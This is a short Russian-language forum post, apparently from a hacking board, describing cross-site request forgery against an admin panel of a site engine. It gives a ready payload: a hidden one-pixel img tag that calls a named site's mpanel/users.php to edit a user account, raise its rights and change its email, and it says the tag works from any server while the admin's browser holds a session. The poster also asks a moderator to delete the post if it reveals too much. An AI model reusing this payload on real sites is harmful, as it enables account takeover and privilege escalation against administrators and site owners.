но тырить можно не только сессию, но и подавать все возможные запросы, к примеру вот такой запрос для мотора
<img src="http://wm.vipwap.pp.ru/mpanel/users.php?action=edit&users=Tzeentch&action=upgrade&udd1=00a26a00&udd4=email@mail.ru&udd7=101&udd6=12.06.2009" height="1" width="1">
а сам код можит находитсо на любом удаленном сервере гг лишбы браузер админа держал сессию
============
Олег, мож я написал лишнего, тогда удали этот пост, хотя я не раз выносил это на паблик.